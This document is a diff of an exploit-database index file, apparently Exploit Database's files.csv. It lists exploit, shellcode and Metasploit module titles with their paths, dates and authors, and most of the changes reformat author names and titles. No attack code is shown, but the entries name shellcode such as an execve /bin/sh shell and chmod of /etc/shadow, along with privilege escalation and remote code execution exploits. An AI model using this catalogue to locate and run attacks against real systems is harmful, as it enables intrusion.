23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation",2003-10-20,"Marc Schoenefeld",windows,remote,0
23266,platforms/cgi/webapps/23266.txt,"Dansie Shopping Cart - Server Error Message Installation Full Path Disclosure",2003-10-20,Dr`Ponidi,cgi,webapps,0
23266,platforms/cgi/webapps/23266.txt,"Dansie Shopping Cart - Server Error Message Installation Full Path Disclosure",2003-10-20,Dr_Ponidi,cgi,webapps,0
23267,platforms/windows/dos/23267.txt,"Atrium Software Mercur MailServer 3.3/4.0/4.2 - IMAP AUTH Remote Buffer Overflow",2003-10-20,"Kostya KORTCHINSKY",windows,dos,0
23268,platforms/java/webapps/23268.txt,"Vivisimo Clustering Engine - Search Script Cross-Site Scripting",2003-10-21,ComSec,java,webapps,0
23269,platforms/php/webapps/23269.txt,"FuzzyMonkey 2.11 - MyClassifieds Email Variable SQL Injection",2003-10-21,Ezhilan,php,webapps,0
@ -21759,7 +21760,7 @@ id,file,description,date,author,platform,type,port
24587,platforms/php/webapps/24587.txt,"PostNuke Modules Factory Subjects Module 2.0 - SQL Injection",2004-09-10,Criolabs,php,webapps,0
24588,platforms/asp/webapps/24588.txt,"GetSolutions GetIntranet 2.2 - Multiple Remote Input Validation Vulnerabilities",2004-09-10,Criolabs,asp,webapps,0
24589,platforms/asp/webapps/24589.txt,"GetSolutions GetInternet - Multiple SQL Injections",2004-09-10,Criolabs,asp,webapps,0
24590,platforms/linux/dos/24590.txt,"Apache/mod_ssl 2.0.x - Remote Denial of Service",2004-09-10,"M. ""Alex"" Hankins",linux,dos,0
24590,platforms/linux/dos/24590.txt,"Apache/mod_ssl 2.0.x - Remote Denial of Service",2004-09-10,"M. _Alex_ Hankins",linux,dos,0
24591,platforms/cgi/webapps/24591.txt,"PerlDesk Language Variable - Server-Side Script Execution",2004-09-13,"Nikyt0x Argentina",cgi,webapps,0
24592,platforms/multiple/dos/24592.txt,"Pingtel Xpressa 1.2.x/2.0/2.1 - Handset Remote Denial of Service",2004-09-13,@stake,multiple,dos,0
24593,platforms/unix/dos/24593.txt,"QNX Photon phrelay-cfg - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0
@ -22932,7 +22933,7 @@ id,file,description,date,author,platform,type,port
33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 - 'arbre.php' Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0
33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 - 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0
33424,platforms/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite - Multiple Cross-Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps,0
33425,platforms/php/webapps/33425.py,"SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation",2014-05-19,"Gregory DRAPERI",php,webapps,80
33425,platforms/php/webapps/33425.py,"SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation",2014-05-19,"Gregory Draperi",php,webapps,80
25777,platforms/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 - IncDir Remote File Inclusion",2005-05-31,"SoulBlack Group",php,webapps,0
25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0
25779,platforms/php/webapps/25779.txt,"MyBB - Multiple Cross-Site Scripting / SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0
@ -23326,7 +23327,7 @@ id,file,description,date,author,platform,type,port
26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 - Prod.php Arbitrary Command Execution",2005-08-18,rgod,php,webapps,0
26172,platforms/php/webapps/26172.txt,"Mantis 0.x/1.0 - Multiple Input Validation Vulnerabilities",2005-08-19,anonymous,php,webapps,0
26173,platforms/windows/dos/26173.txt,"AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method",2013-06-13,"Javier Repiso Sánchez",windows,dos,0
26174,platforms/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez, Lopez, Castillo",hardware,webapps,0
26174,platforms/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez_ Lopez_ Castillo",hardware,webapps,0
26175,platforms/windows/remote/26175.rb,"Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009)",2013-06-13,Metasploit,windows,remote,0
26176,platforms/php/webapps/26176.txt,"Woltlab Burning Board 2.x - ModCP.php SQL Injection",2005-08-20,[R],php,webapps,0
26177,platforms/php/webapps/26177.txt,"Land Down Under 800/801 - links.php w Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0
@ -23459,7 +23460,7 @@ id,file,description,date,author,platform,type,port
26330,platforms/multiple/remote/26330.txt,"Oracle HTML DB 1.5/1.6 - wwv_flow.accept p_t02 Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0
26331,platforms/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus TLS Listener - Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0
26318,platforms/hardware/remote/26318.py,"TP-Link Print Server TL PS110U - Sensitive Information Enumeration",2013-06-19,SANTHO,hardware,remote,0
26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh, Mormoroth",php,webapps,0
26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh_ Mormoroth",php,webapps,0
26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - footer.php Multiple Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0
26329,platforms/multiple/remote/26329.txt,"Oracle HTML DB 1.5/1.6 - f p Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0
26321,platforms/linux/local/26321.c,"Gnome-PTY-Helper UTMP - Hostname Spoofing",2005-10-03,"Paul Szabo",linux,local,0
@ -24058,6 +24059,7 @@ id,file,description,date,author,platform,type,port
26931,platforms/asp/webapps/26931.txt,"ProjectApp 3.3 - search_employees.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0
26932,platforms/asp/webapps/26932.txt,"ProjectApp 3.3 - cat.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0
26933,platforms/cgi/webapps/26933.txt,"ProjectApp 3.3 - links.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,cgi,webapps,0
40385,platforms/netbsd_x86/local/40385.rb,"NetBSD mail.local - Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0
26934,platforms/asp/webapps/26934.txt,"ProjectApp 3.3 - pmprojects.asp projectid Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0
26935,platforms/asp/webapps/26935.txt,"ProjectApp 3.3 - 'login.asp' ret_page Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0
26936,platforms/asp/webapps/26936.txt,"ProjectApp 3.3 - default.asp skin_number Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0
@ -24111,6 +24113,7 @@ id,file,description,date,author,platform,type,port
26984,platforms/php/webapps/26984.txt,"IceWarp Universal WebMail - /mail/include.html Crafted HTTP_USER_AGENT Arbitrary File Access",2005-12-27,"Tan Chew Keong",php,webapps,0
26985,platforms/windows/dos/26985.txt,"Microsoft Internet Explorer 5.0.1 - HTML Parsing Denial of Service",2005-12-27,"Christian Deneke",windows,dos,0
26986,platforms/cfm/webapps/26986.txt,"PaperThin CommonSpot Content Server 4.5 - Cross-Site Scripting",2005-12-23,r0t3d3Vil,cfm,webapps,0
40384,platforms/java/webapps/40384.txt,"Apache Mina 2.0.13 - Remote Command Execution",2016-09-15,"Gregory Draperi",java,webapps,0
26987,platforms/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,java,webapps,0
26988,platforms/php/webapps/26988.txt,"Koobi 5.0 - BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0
26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting",2005-12-29,Lostmon,php,webapps,0
@ -24999,7 +25002,7 @@ id,file,description,date,author,platform,type,port
27891,platforms/hardware/remote/27891.txt,"Ipswitch WhatsUp Professional 2006 - Authentication Bypass",2006-05-17,"Kenneth F. Belva",hardware,remote,0
27892,platforms/hardware/remote/27892.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0
27893,platforms/hardware/remote/27893.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - events.tar source_ip Parameter Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0
40382,platforms/multiple/remote/40382.txt,"Apache Mina 2.0.13 - Remote Command Execution",2016-09-14,"Gregory DRAPERI",multiple,remote,0
40382,platforms/multiple/remote/40382.txt,"Apache Mina 2.0.13 - Remote Command Execution",2016-09-14,"Gregory Draperi",multiple,remote,0
27894,platforms/hardware/remote/27894.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - eventplayer get_image_info_abspath Parameter Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0
27895,platforms/cgi/webapps/27895.txt,"Cosmoshop 8.10.78/8.11.106 - Lshop.cgi SQL Injection",2006-05-18,l0om,cgi,webapps,0
27896,platforms/asp/webapps/27896.txt,"ASPBB 0.5.2 - default.asp action Parameter Cross-Site Scripting",2006-05-18,TeufeL,asp,webapps,0
@ -26767,7 +26770,7 @@ id,file,description,date,author,platform,type,port
29703,platforms/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php' 's' Variable SQL Injection",2007-02-26,CorryL,php,webapps,0
29704,platforms/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0
29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - register.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0
29706,platforms/linux/remote/29706.txt,"DeepOfix SMTP Server 3.3 - Authentication Bypass",2013-11-19,"Gerardo Vazquez, Eduardo Arriols",linux,remote,0
29706,platforms/linux/remote/29706.txt,"DeepOfix SMTP Server 3.3 - Authentication Bypass",2013-11-19,"Gerardo Vazquez_ Eduardo Arriols",linux,remote,0
29707,platforms/windows/dos/29707.txt,"JPEGView 1.0.29 - Crash (PoC)",2013-11-19,"Debasish Mandal",windows,dos,0
29709,platforms/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,hardware,webapps,80
30368,platforms/php/webapps/30368.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - admin/edituser.php userid Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0
@ -31927,7 +31930,7 @@ id,file,description,date,author,platform,type,port
35392,platforms/php/webapps/35392.txt,"WordPress Plugin IGIT Posts Slider Widget 1.0 - 'src' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0
35393,platforms/php/webapps/35393.txt,"WordPress Plugin ComicPress Manager 1.4.9 - 'lang' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0
35394,platforms/php/webapps/35394.txt,"WordPress Plugin YT-Audio 1.7 - 'v' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0
35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit , Kurawa",php,webapps,0
35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit _ Kurawa",php,webapps,0
35397,platforms/php/webapps/35397.txt,"Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Parameter Cross-Site Scripting",2011-02-23,MustLive,php,webapps,0
35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - '.ksf' Remote Buffer Overflow",2011-02-28,KedAns-Dz,multiple,remote,0
35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - '.dps' Remote Buffer Overflow",2011-02-28,KedAns-Dz,windows,remote,0
@ -32041,8 +32044,8 @@ id,file,description,date,author,platform,type,port
35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
35508,platforms/php/webapps/35508.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / SQL Injection",2011-03-27,MustLive,php,webapps,0
35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 - '.fp4f' Remote Buffer Overflow",2011-03-27,KedAns-Dz,windows,remote,0
35510,platforms/php/webapps/35510.txt,"Humhub 0.10.0-rc.1 - SQL Injection",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
35511,platforms/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
35510,platforms/php/webapps/35510.txt,"Humhub 0.10.0-rc.1 - SQL Injection",2014-12-10,"Jos Wetzels_ Emiel Florijn",php,webapps,0
35511,platforms/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels_ Emiel Florijn",php,webapps,0
35558,platforms/php/webapps/35558.txt,"PHP-Fusion - 'articles.php' Cross-Site Scripting",2011-04-02,KedAns-Dz,php,webapps,0
35559,platforms/php/webapps/35559.txt,"MyBB 1.4/1.6 - Multiple Security Vulnerabilities",2011-04-04,MustLive,php,webapps,0
35513,platforms/linux/remote/35513.py,"Apache James Server 2.3.2 - Remote Command Execution",2014-12-10,"Jakub Palaczynski",linux,remote,4555
@ -32268,7 +32271,7 @@ id,file,description,date,author,platform,type,port
35767,platforms/php/webapps/35767.txt,"Gecko CMS 2.3 - Multiple Vulnerabilities",2015-01-13,LiquidWorm,php,webapps,80
35998,platforms/php/webapps/35998.txt,"CobraScripts Trading Marketplace Script - 'cid' Parameter SQL Injection",2011-07-25,Ehsan_Hp200,php,webapps,0
35786,platforms/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",multiple,webapps,80
35770,platforms/hardware/webapps/35770.py,"Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness",2015-01-13,"Yong Chuan, Koh",hardware,webapps,623
35770,platforms/hardware/webapps/35770.py,"Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness",2015-01-13,"Yong Chuan_ Koh",hardware,webapps,623
35771,platforms/osx/dos/35771.c,"Apple Mac OSX 10.10 - BlueTooth DispatchHCICreateConnection - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0
35772,platforms/osx/dos/35772.c,"Apple Mac OSX 10.10 - BlueTooth BlueToothHCIChangeLocalName - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0
35773,platforms/osx/dos/35773.c,"Apple Mac OSX 10.10 - BlueTooth TransferACLPacketToHW - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0
@ -33779,9 +33782,9 @@ id,file,description,date,author,platform,type,port
37383,platforms/php/webapps/37383.php,"Joomla! Component Easy Flash Uploader - 'helper.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
37384,platforms/lin_x86/shellcode/37384.c,"Linux/x86 - execve /bin/sh Shellcode (23 bytes)",2015-06-26,"Bill Borskey",lin_x86,shellcode,0
37386,platforms/osx/dos/37386.php,"Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x - Crash (PoC)",2015-06-26,"Mohammad Reza Espargham",osx,dos,0
37387,platforms/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
37388,platforms/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
37389,platforms/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
37387,platforms/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner and Dimitris Simos",php,webapps,0
37388,platforms/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner and Dimitris Simos",php,webapps,0
37389,platforms/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner and Dimitris Simos",php,webapps,0
37390,platforms/lin_x86/shellcode/37390.asm,"Linux/x86 - chmod('/etc/passwd'_0777) Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
37391,platforms/lin_x86/shellcode/37391.asm,"Linux/x86 - chmod('/etc/gshadow') Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
37392,platforms/lin_x86/shellcode/37392.asm,"Linux/x86 - chmod('/etc/shadow'_'0777') Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
@ -34000,7 +34003,7 @@ id,file,description,date,author,platform,type,port
37623,platforms/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple Remote Code Execution Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - Cross-Site Request Forgery / Cross-Site Scripting",2015-07-16,"Pierre Kim",hardware,webapps,0
37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0
37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and Remote Code Execution",2015-07-16,"Pierre Kim",hardware,webapps,0
37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor / Remote Code Execution",2015-07-16,"Pierre Kim",hardware,webapps,0
37628,platforms/hardware/remote/37628.rb,"D-Link - Cookie Command Execution",2015-07-17,Metasploit,hardware,remote,0
37629,platforms/php/webapps/37629.txt,"WordPress Plugin BuddyPress Activity Plus 1.5 - Cross-Site Request Forgery",2015-07-17,"Tom Adams",php,webapps,80
37630,platforms/php/webapps/37630.txt,"Hotel Booking Portal 0.1 - Multiple SQL Injections / Cross-Site Scripting",2012-08-09,"Yakir Wizman",php,webapps,0
@ -34805,7 +34808,7 @@ id,file,description,date,author,platform,type,port
38483,platforms/hardware/dos/38483.txt,"TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0
38484,platforms/php/webapps/38484.rb,"WordPress Plugin Ajax Load More < 2.8.2 - Arbitrary File Upload",2015-10-18,PizzaHatHacker,php,webapps,0
38485,platforms/windows/dos/38485.py,"VideoLAN VLC Media Player 2.2.1 - libvlccore '.mp3' Stack Overflow",2015-10-18,"Andrea Sindoni",windows,dos,0
38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0
38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc_ nudragn_ rungga_reksya",windows,local,0
38487,platforms/php/webapps/38487.txt,"WordPress Theme Colormix - Multiple Security Vulnerabilities",2013-04-21,MustLive,php,webapps,0
38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08 / 1.00.09 - Directory Traversal",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0
38489,platforms/php/remote/38489.rb,"Nibbleblog - Arbitrary File Upload",2015-10-19,Metasploit,php,remote,0
@ -34970,7 +34973,7 @@ id,file,description,date,author,platform,type,port
39374,platforms/osx/dos/39374.c,"Apple Mac OSX - Kernel IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0
38659,platforms/windows/dos/38659.py,"POP Peeper 4.0.1 - Overwrite (SEH)",2015-11-09,Un_N0n,windows,dos,0
38660,platforms/php/remote/38660.rb,"WordPress Plugin Ajax Load More 2.8.1.1 - PHP Upload",2015-11-09,Metasploit,php,remote,0
38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - Cross-Site Request Forgery",2015-11-09,"Aravind C Ajayan, Balagopal N",php,webapps,0
38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - Cross-Site Request Forgery",2015-11-09,"Aravind C Ajayan_ Balagopal N",php,webapps,0
38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0
38663,platforms/hardware/remote/38663.txt,"Huawei HG630a and HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",hardware,remote,0
38664,platforms/java/webapps/38664.py,"Jenkins 1.633 - Unauthenticated Credential Recovery",2015-11-10,"The Repo",java,webapps,0
@ -36293,7 +36296,7 @@ id,file,description,date,author,platform,type,port
40060,platforms/jsp/webapps/40060.txt,"24online SMS_2500i 8.3.6 build 9.0 - SQL Injection",2016-07-06,"Rahul Raz",jsp,webapps,80
40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0
40062,platforms/php/webapps/40062.txt,"Advanced Webhost Billing System (AWBS) 2.9.6 - Multiple Vulnerabilities",2016-07-06,"Bikramaditya Guha",php,webapps,80
40063,platforms/cgi/webapps/40063.txt,"PaKnPost Pro 1.14 - Multiple Vulnerabilities",2016-07-06,"Edvin Rustemagic, Grega Preseren",cgi,webapps,80
40063,platforms/cgi/webapps/40063.txt,"PaKnPost Pro 1.14 - Multiple Vulnerabilities",2016-07-06,"Edvin Rustemagic_ Grega Preseren",cgi,webapps,80
40064,platforms/linux/remote/40064.txt,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution",2016-07-06,"Dawid Golunski",linux,remote,0
40065,platforms/jsp/webapps/40065.txt,"OpenFire 3.10.2 < 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,jsp,webapps,80
40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0
@ -36396,7 +36399,7 @@ id,file,description,date,author,platform,type,port
40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
40202,platforms/php/webapps/40202.txt,"Subrion CMS 4.0.5 - SQL Injection",2016-08-05,Vulnerability-Lab,php,webapps,80
40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - (Connection Name) Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0
40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0
40204,platforms/php/webapps/40204.txt,"PHP Power Browse 1.2 - Directory Traversal",2016-08-05,"Manuel Mancera",php,webapps,80
40205,platforms/cgi/webapps/40205.txt,"Davolink DV-2051 - Multiple Vulnerabilities",2016-08-05,"Eric Flokstra",cgi,webapps,80
40206,platforms/php/webapps/40206.txt,"WordPress Plugin Count per Day 3.5.4 - Persistent Cross-Site Scripting",2016-08-05,"Julien Rentrop",php,webapps,80
@ -36408,7 +36411,7 @@ id,file,description,date,author,platform,type,port
40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection",2016-08-06,LiquidWorm,php,webapps,80
40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - Remote Code Execution (Shellshock)",2016-08-06,LiquidWorm,cgi,webapps,80
40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80
40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80
40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - 'strong_user.php' Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80
40216,platforms/jsp/webapps/40216.txt,"Navis Webaccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000
40218,platforms/php/webapps/40218.txt,"PHPCollab CMS 2.5 - (emailusers.php) SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80
40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0
@ -36452,7 +36455,7 @@ id,file,description,date,author,platform,type,port
40255,platforms/windows/dos/40255.txt,"Microsoft GDI+ - DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
40256,platforms/windows/dos/40256.txt,"Microsoft GDI+ - ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
40257,platforms/windows/dos/40257.txt,"Microsoft GDI+ - EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - Authentication Bypass (EXTRABACON)",2016-08-18,"Shadow Brokers",hardware,remote,161
40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass",2016-08-18,"Shadow Brokers",hardware,remote,161
40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40260,platforms/cgi/webapps/40260.sh,"SIEMENS IP Camera CCMW1025 x.2.2.1798 - Remote Admin Credentials Change",2016-08-18,"Todor Donev",cgi,webapps,80
40261,platforms/cgi/webapps/40261.txt,"Honeywell IP-Camera HICC-1100PT - Credentials Disclosure",2016-08-18,"Yakir Wizman",cgi,webapps,80
@ -36463,15 +36466,15 @@ id,file,description,date,author,platform,type,port
40267,platforms/cgi/webapps/40267.txt,"MESSOA IP-Camera NIC990 - Authentication Bypass / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80
40268,platforms/windows/local/40268.rb,"Microsoft Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit)",2016-08-19,"Pablo González",windows,local,0
40269,platforms/cgi/webapps/40269.txt,"ZYCOO IP Phone System - Remote Command Execution",2016-08-19,0x4148,cgi,webapps,0
40270,platforms/linux/local/40270.txt,"Watchguard Firewalls - ifconfig Privilege Escalation (ESCALATEPLOWMAN)",2016-08-19,"Shadow Brokers",linux,local,0
40271,platforms/hardware/local/40271.txt,"Cisco ASA / PIX - Privilege Escalation (EPICBANANA)",2016-08-19,"Shadow Brokers",hardware,local,0
40272,platforms/cgi/webapps/40272.txt,"TOPSEC Firewalls - Remote Code Execution (ELIGIBLECONTESTANT)",2016-08-19,"Shadow Brokers",cgi,webapps,0
40273,platforms/cgi/webapps/40273.txt,"TOPSEC Firewalls - Remote Code Execution (ELIGIBLECANDIDATE)",2016-08-19,"Shadow Brokers",cgi,webapps,0
40274,platforms/cgi/webapps/40274.txt,"TOPSEC Firewalls - Remote Code Execution (ELIGIBLEBOMBSHELL)",2016-08-19,"Shadow Brokers",cgi,webapps,0
40275,platforms/hardware/remote/40275.txt,"TOPSEC Firewalls - Remote Exploit (ELIGIBLEBACHELOR)",2016-08-19,"Shadow Brokers",hardware,remote,0
40276,platforms/hardware/webapps/40276.txt,"Fortigate Firewalls - Remote Code Execution (EGREGIOUSBLUNDER)",2016-08-19,"Shadow Brokers",hardware,webapps,0
40270,platforms/linux/local/40270.txt,"Watchguard Firewalls - 'ESCALATEPLOWMAN' ifconfig Privilege Escalation",2016-08-19,"Shadow Brokers",linux,local,0
40271,platforms/hardware/local/40271.txt,"Cisco ASA / PIX - 'EPICBANANA' Privilege Escalation",2016-08-19,"Shadow Brokers",hardware,local,0
40272,platforms/cgi/webapps/40272.txt,"TOPSEC Firewalls - 'ELIGIBLECONTESTANT' Remote Code Execution",2016-08-19,"Shadow Brokers",cgi,webapps,0
